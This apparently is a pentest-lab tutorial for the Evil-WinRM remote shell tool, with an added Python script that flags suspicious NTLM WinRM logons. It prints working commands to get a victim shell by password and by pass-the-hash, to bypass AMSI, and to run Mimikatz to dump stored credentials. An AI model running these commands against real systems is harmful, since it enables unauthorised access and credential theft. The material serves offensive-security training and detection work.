
Contents

Evil-winrm
    Features
Installation
Load PowerShell scripts
Pass the Hash
Install using its Docker image

Evil-winrm
Evil-WinRM is a shell client for Windows Remote Management (WinRM). It can be used against any Microsoft Windows server that has WinRM enabled (usually listening on port 5985), but only if you hold credentials and permissions to use it, so it belongs to the post-exploitation phase of a hacking/pentesting engagement. The purpose of the program is to provide convenient, easy-to-use features for hacking. System administrators can use it for legitimate remote administration as well, but most of its features are aimed at hacking/pen-testing work.

Features

- Compatible with Linux and Windows client systems
- Load PowerShell scripts in memory
- Load DLL files in memory, bypassing some AVs
- Load C# (C Sharp) assemblies in memory, bypassing some AVs
- Load x64 payloads generated with the donut technique
- AMSI bypass
- Pass-the-hash support
- Kerberos auth support
- SSL and certificate support
- Upload and download files with a progress bar
- List remote machine services without privileges
- Command history
- WinRM command completion
- Local file completion
- Colorization of the prompt and output messages (can be disabled)
- Docker support (prebuilt images available on Docker Hub)
- Trap capturing to avoid accidental shell exit on Ctrl+C

Installation
This post covers two easy methods to install evil-winrm on Kali Linux; you will find more installation methods on its GitHub page.
With the Ruby gem, you can install evil-winrm directly. It automatically installs all the dependencies on your machine when you run the following command:

gem install evil-winrm

Once it is installed, you can display its help by running 'evil-winrm' with no arguments; this prints the syntax and the other options for running evil-winrm against the Windows Remote Management service.

Now, using evil-winrm, we try to reach a remote machine's shell by connecting to port 5985, the port on which WinRM is listening. As a result, it gives us access to the victim's shell by exposing its PowerShell, as shown below.
Syntax: evil-winrm -i <Windows IP> -u <username> -p <'password'>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

It not only provides a shell on the host machine but also offers a menu to load functions such as Invoke-Binary, Dll-Loader, Donut-Loader, and Bypass-4MSI.

Load PowerShell scripts
We have some pentesting PowerShell scripts in /root/powershell, and we can upload these .ps1 scripts to the host machine through evil-winrm.

The .ps1 scripts must be in the path given with the -s argument; run evil-winrm as shown below:
Syntax: evil-winrm -i <Windows IP> -u <username> -p <'password'> -s <path>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell/

Type menu again to see the loaded functions, use Bypass-4MSI, then invoke the script. Here we have uploaded the Mimikatz PowerShell script to dump stored credentials.

menu
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
sekurlsa::logonpasswords

As a result, it dumps all the credentials stored on the Windows Server.

Pass the Hash
Evil-winrm has one more feature that lets you conduct a pass-the-hash attack, which likewise results in a shell on the host machine.

evil-winrm -i 192.168.1.105 -u administrator -H 32196B56FFE6F4E294117B91A83BF38
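A defender-side counterpart to the two connection methods shown above (password logon and pass-the-hash), added here as an example and not part of the original post: a Python script that scans WinRM session records for logons to the WinRM ports from hosts outside an administrative allowlist, and for NTLM-authenticated WinRM logons. Both connections in this post produce NTLM logons, because evil-winrm is pointed at an IP address (Kerberos requires a hostname for its service principal) and pass-the-hash is by definition NTLM authentication. The key=value record format, the allowlist address and every sample record are constructed for this example.

```python
import re
from collections import Counter

# Ports of the WinRM HTTP and HTTPS listeners (5985 is the one the post connects to)
WINRM_PORTS = {5985, 5986}

# Hosts from which remote management is expected (constructed allowlist, an assumption)
ADMIN_JUMP_HOSTS = {"192.168.1.10"}

# Constructed sample records in a simple key=value format, not real logs
SAMPLE_LOG = """\
2024-05-01T10:00:01 src=192.168.1.10 dst=192.168.1.105 dport=5985 user=svc_ops auth=Kerberos result=success
2024-05-01T10:02:13 src=192.168.1.50 dst=192.168.1.105 dport=5985 user=administrator auth=NTLM result=success
2024-05-01T10:02:20 src=192.168.1.50 dst=192.168.1.105 dport=5985 user=administrator auth=NTLM result=success
2024-05-01T10:05:00 src=192.168.1.50 dst=192.168.1.105 dport=445 user=administrator auth=NTLM result=success
2024-05-01T10:06:00 src=192.168.1.77 dst=192.168.1.105 dport=5986 user=bob auth=NTLM result=failure
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.+)$")


def parse_record(line):
    """Parse one 'timestamp key=value ...' line into a dict, or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {"ts": m.group("ts")}
    for token in m.group("kv").split():
        key, sep, value = token.partition("=")
        if not sep:
            return None  # a bare token means the line is not in the expected format
        rec[key] = value
    try:
        rec["dport"] = int(rec["dport"])
    except (KeyError, ValueError):
        return None
    return rec


def analyze_winrm_sessions(log_text, allowlist=ADMIN_JUMP_HOSTS):
    """Return a list of findings for WinRM sessions that merit an analyst's look."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or rec["dport"] not in WINRM_PORTS:
            continue  # not WinRM traffic (e.g. the SMB record on port 445 is skipped)
        reasons = []
        if rec.get("src") not in allowlist:
            reasons.append("winrm-from-unexpected-source")
        if rec.get("auth") == "NTLM" and rec.get("result") == "success":
            # Kerberos is expected for domain accounts; NTLM is what an IP-addressed
            # connection or a pass-the-hash logon produces
            reasons.append("ntlm-winrm-logon")
        if reasons:
            findings.append({
                "ts": rec["ts"],
                "src": rec.get("src"),
                "user": rec.get("user"),
                "dport": rec["dport"],
                "reasons": reasons,
            })
    return findings


def sessions_per_source(findings):
    """Count flagged WinRM sessions per source address to spot one host repeatedly hitting WinRM."""
    return Counter(f["src"] for f in findings)


if __name__ == "__main__":
    results = analyze_winrm_sessions(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['src']} -> :{f['dport']} user={f['user']} {', '.join(f['reasons'])}")
    print("flagged sessions per source:", dict(sessions_per_source(results)))
```

On the constructed sample, the Kerberos logon from the allowlisted jump host passes, the SMB record is ignored, and the three remaining WinRM records are flagged; the two successful NTLM logons as administrator from 192.168.1.50 are the pattern the password and pass-the-hash connections above would leave. In a real deployment the allowlist comes from your inventory of management hosts, and the records would be built from the WinRM listener's logs or network flow data rather than the embedded sample.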

Install using its Docker image
This is a very easy and convenient way to install evil-winrm on your attacking machine and, in the same step, obtain a shell on the victim machine through its WinRM service. You only need to run the following command:

docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'
